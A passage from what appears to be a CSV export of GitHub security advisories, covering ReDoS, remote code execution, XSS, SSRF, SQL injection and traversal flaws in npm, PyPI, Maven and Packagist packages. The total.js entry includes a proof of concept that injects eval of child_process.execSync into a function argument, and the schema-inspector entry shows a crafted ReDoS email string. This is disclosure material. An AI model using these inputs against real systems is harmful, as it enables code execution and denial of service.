`a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.`) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ +Users should upgrade to version 2.0.0, which uses a regex expression that isn't vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case. + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ +If a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a ""not yet validated"" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways. + +### References +_Are there any links users can visit to find out more?_ +https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f + +### For more information +If you have any questions or comments about this advisory, you can create an issue in this repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'schema-inspector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/schema-inspector/schema-inspector/security/advisories/GHSA-f38p-c2gq-4pmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21267'}, {'type': 'WEB', 'url': 'https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f'}, {'type': 'WEB', 'url': 'https://github.com/schema-inspector/schema-inspector/releases/tag/2.0.0'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210528-0006/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/schema-inspector'}]","{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:14:08Z', 'nvd_published_at': '2021-03-19T21:15:00Z'}" +1.4.0,GHSA-hwpc-8xqv-jvj4,2022-10-25T20:37:12Z,2021-03-22T23:28:38Z,,['CVE-2021-21345'],XStream is vulnerable to a Remote Command Execution attack,"### Impact +The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21345](https://x-stream.github.io/CVE-2021-21345.html). + +### Credits +钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21345'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21345.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:24:01Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-fvgf-6h6h-3322,2023-09-05T14:35:06Z,2021-03-18T20:29:49Z,,['CVE-2021-3281'],Django Directory Traversal via archive.extract,"In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by ""startapp --template"" and ""startproject --template"") allows directory traversal via an archive with absolute paths or relative paths with dot segments.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2'}, {'fixed': '2.2.18'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1'}, {'fixed': '3.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0'}, {'fixed': '3.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3281'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/02e6592835b4559909aa3aaaf67988fef435f624'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/05413afa8c18cdb978fcdf470e09f7a12b234a23'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/21e7622dec1f8612c85c2fc37fe8efbfd3311e37'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/52e409ed17287e9aabda847b6afe58be2fa9f86a'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/3.0.12/'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.1/releases/security/'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YF52FKEH5S2P5CM4X7IXSYG67YY2CDOO/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210226-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/feb/01/security-releases/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:34:01Z', 'nvd_published_at': '2021-02-02T07:15:00Z'}" +1.4.0,GHSA-vw2g-5827-m9fp,2021-03-23T15:20:17Z,2021-03-29T20:55:52Z,,['CVE-2019-1308'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1335, CVE-2019-1366.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1308'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/64376deca69126c2bb05cd87bd5c073aedaf5f9c'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1308'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:20:17Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}" +1.4.0,GHSA-8278-88vv-x98r,2021-03-10T21:51:06Z,2021-03-10T21:51:17Z,,['CVE-2021-21371'],Execution of untrusted code through config file,"### Impact +It is possible to run arbitrary commands through the yaml.load() method. This could allow an attacker with local access to the host to run arbitrary code by running the application with a specially crafted YAML configuration file. + +### Workarounds +Manually adjust yaml.load() to yaml.safe_load() + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [tenable/integration-jira-cloud](https://github.com/tenable/integration-jira-cloud/issues) +* Email us at [vulnreport@tenable.com](mailto:vulnreport@tenable.com)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'tenable-jira-cloud'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.21'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tenable/integration-jira-cloud/security/advisories/GHSA-8278-88vv-x98r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21371'}, {'type': 'WEB', 'url': 'https://github.com/tenable/integration-jira-cloud/commit/f8c2095fd529e664e7fa25403a0a4a85bb3907d0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/tenable-jira-cloud/'}, {'type': 'WEB', 'url': 'https://pyyaml.docsforge.com/master/documentation/#loading-yaml'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T21:51:06Z', 'nvd_published_at': '2021-03-10T22:15:00Z'}" +1.4.0,GHSA-9652-78hp-w58c,2021-03-19T22:19:46Z,2021-03-29T20:07:39Z,,['CVE-2021-3271'],Stored cross-site scripting in PressBooks,"PressBooks 5.17.3 contains a cross-site scripting (XSS). Stored XSS can be submitted via the Book Info's Long Description Body, and all actions to open or preview the books page will result in the triggering the stored XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pressbooks/pressbooks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.18.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3271'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks/pull/2072'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks/commit/941a8c5eaeacea5eb211b54ee55bc0348139cbd8'}, {'type': 'WEB', 'url': 'https://github.com/pressbooks/pressbooks'}, {'type': 'WEB', 'url': 'https://www.gosecure.net/blog/2021/02/16/cve-2021-3271-pressbooks-stored-cross-site-scripting-proof-of-concept/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T22:19:46Z', 'nvd_published_at': '2021-02-18T19:15:00Z'}" +1.4.0,GHSA-53r4-h27g-rg3x,2021-03-18T22:22:03Z,2021-03-29T20:59:07Z,,['CVE-2019-0992'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0992'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/53b75c5f4a206740375f6a8a96934242d556e7c4'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0992'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:22:03Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}" +1.4.0,GHSA-hqqv-9x3v-mp7w,2021-03-16T16:31:12Z,2021-03-18T19:27:20Z,,['CVE-2020-7014'],Privilege Escalation Flaw in Elasticsearch,The fix for CVE-2020-7009 was found to be incomplete. Elasticsearch versions from 6.7.0 to 6.8.7 and 7.0.0 to 7.6.1 contain a privilege escalation flaw if an attacker is able to create API keys and also authentication tokens. An attacker who is able to generate an API key and an authentication token can perform a series of steps that result in an authentication token being generated with elevated privileges.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.7.0'}, {'fixed': '6.8.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7014'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200619-0003/'}, {'type': 'WEB', 'url': 'https://www.elastic.co/community/security/'}]","{'cwe_ids': ['CWE-266', 'CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T16:31:12Z', 'nvd_published_at': '2020-06-03T18:15:00Z'}" +1.4.0,GHSA-xr9h-9m79-x29g,2021-02-24T06:59:10Z,2021-03-01T19:38:23Z,,['CVE-2020-8902'],SSRF in Rendertron,"Rendertron versions prior to 3.0.0 are are susceptible to a Server-Side Request Forgery (SSRF) attack. An attacker can use a specially crafted webpage to force a rendertron headless chrome process to render internal sites it has access to, and display it as a screenshot. Suggested mitigations are to upgrade your rendertron to version 3.0.0, or, if you cannot update, to secure the infrastructure to limit the headless chrome's access to your internal domain.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rendertron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8902'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChrome/rendertron/releases/tag/3.0.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rendertron'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T06:59:10Z', 'nvd_published_at': '2021-02-23T12:15:00Z'}" +1.4.0,GHSA-9hx2-hgq2-2g4f,2021-12-02T17:47:58Z,2021-03-29T16:35:46Z,,['CVE-2021-25292'],Regular Expression Denial of Service (ReDoS) in Pillow,An issue was discovered in Pillow before 8.1.1. The PDF parser allows a regular expression DoS (ReDoS) attack via a crafted PDF file because of a catastrophic backtracking regex.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25292'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3bce145966374dd39ce58a6fc0083f8d1890719c'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/6207b44ab1ff4a91d8ddc7579619876d0bb191a4'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:05:35Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}" +1.4.0,GHSA-5q6m-3h65-w53x,2022-08-03T17:21:06Z,2021-03-11T22:26:09Z,,['CVE-2021-24033'],react-dev-utils OS Command Injection in function `getProcessForPort`,"react-dev-utils prior to v11.0.4 exposes a function, `getProcessForPort`, where an input argument is concatenated into a command string to be executed. This function is typically used from react-scripts (in Create React App projects), where the usage is safe. Only when this function is manually invoked with user-provided values (ie: by custom code) is there the potential for command injection. If you're consuming it from react-scripts then this issue does not affect you.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'react-dev-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '11.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-24033'}, {'type': 'WEB', 'url': 'https://github.com/facebook/create-react-app/pull/10644'}, {'type': 'WEB', 'url': 'https://github.com/facebook/create-react-app/commit/f5e415f3a5b66f07dcc60aba1b445fa7cda97268'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebook/create-react-app'}, {'type': 'WEB', 'url': 'https://www.facebook.com/security/advisories/cve-2021-24033'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/1-npm-react-dev-utils/'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T22:18:08Z', 'nvd_published_at': '2021-03-09T01:15:00Z'}" +1.4.0,GHSA-x79j-wgqv-g8h2,2021-03-29T18:02:42Z,2021-03-23T01:54:06Z,,['CVE-2021-21358'],Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in typo3/cms-form," +### Problem +It has been discovered that the Form Designer backend module of the Form Framework is vulnerable to cross-site scripting. A valid backend user account with access to the form module is needed to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 10.4.14 or 11.1.1 that fix the problem described. + +### Credits +Thanks to Richie Lee who reported this issue and to TYPO3 framework merger Andreas Fernandez who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-004](https://typo3.org/security/advisory/typo3-core-sa-2021-004)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.2.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-x79j-wgqv-g8h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21358'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-form'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-004'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:00Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}" +1.4.0,GHSA-3wj8-vp9h-rm6m,2023-09-13T20:23:10Z,2021-03-19T21:32:20Z,,['CVE-2021-23344'],total.js Remote Code Execution Vulnerability,"total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application. + +Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`. + +### PoC +```js +// To be run in a nodejs console: +require('total.js/utils').set({}, 'a;eval(`require(""child_process"")\\x2eexecSync(""touch pwned"")`);//') +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'total.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.8'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.4.7'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23344'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework/commit/c812bbcab8981797d3a1b9993fc42dad3d246f04'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TOTALJS-1077069'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:42:43Z', 'nvd_published_at': '2021-03-04T17:15:00Z'}" +1.4.0,GHSA-wq4r-8342-jmc9,2021-03-23T20:31:43Z,2021-03-29T20:24:44Z,,['CVE-2021-28381'],SQL injection in vhs (aka VHS: Fluid ViewHelpers),The vhs (aka VHS: Fluid ViewHelpers) extension before 5.1.1 for TYPO3 allows SQL injection via isLanguageViewHelper.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'fluidtypo3/vhs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28381'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-001'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T20:31:43Z', 'nvd_published_at': '2021-03-16T20:15:00Z'}" +1.4.0,GHSA-4p9g-qgx9-397p,2021-03-29T17:43:44Z,2021-03-23T01:54:09Z,,['CVE-2021-21359'],Denial of Service in Page Error Handling,"> ### Meta +> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C` (5.5) +> * CWE-405, CWE-674 +> * Status: **DRAFT** + +### Problem +Requesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content to be shown as error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded. + +### Solution +Update to TYPO3 versions 9.5.25, 10.4.14, 11.1.1 that fix the problem described. + +### Credits +Thanks to Paul Keller, Mathias Bolt Lesniak and Kay Strobach who reported this issue and to TYPO3 framework merger Frank Nägler and to TYPO3 security team member Torben Hansen who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-005](https://typo3.org/security/advisory/typo3-core-sa-2021-005)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4p9g-qgx9-397p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21359'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-core'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-005'}]","{'cwe_ids': ['CWE-405', 'CWE-674'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:10Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}" +1.4.0,GHSA-w36g-q975-37rg,2021-03-12T22:48:12Z,2021-03-18T19:30:20Z,,['CVE-2021-26814'],Improper Input Validation (RCE),Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wazuh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26814'}, {'type': 'WEB', 'url': 'https://documentation.wazuh.com/4.0/release-notes/release_4_0_4.html'}, {'type': 'WEB', 'url': 'https://github.com/wazuh/wazuh/releases/tag/v4.0.4'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:48:12Z', 'nvd_published_at': '2021-03-06T02:15:00Z'}" +1.4.0,GHSA-pjj4-jjgc-h3r8,2021-03-12T22:28:01Z,2021-03-12T23:09:24Z,,[],Authenticated remote code execution,"### Impact +Authenticated remote code execution using plugin manager without ACL permissions. + +### Patches +We recommend to update to the current version 6.3.5.2. You can get the update to 6.3.5.2 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-03-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-pjj4-jjgc-h3r8'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-03-2021'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T22:28:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-vmf5-924f-25f2,2021-03-18T22:36:03Z,2021-03-29T20:59:12Z,,['CVE-2019-1103'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1092, CVE-2019-1106, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 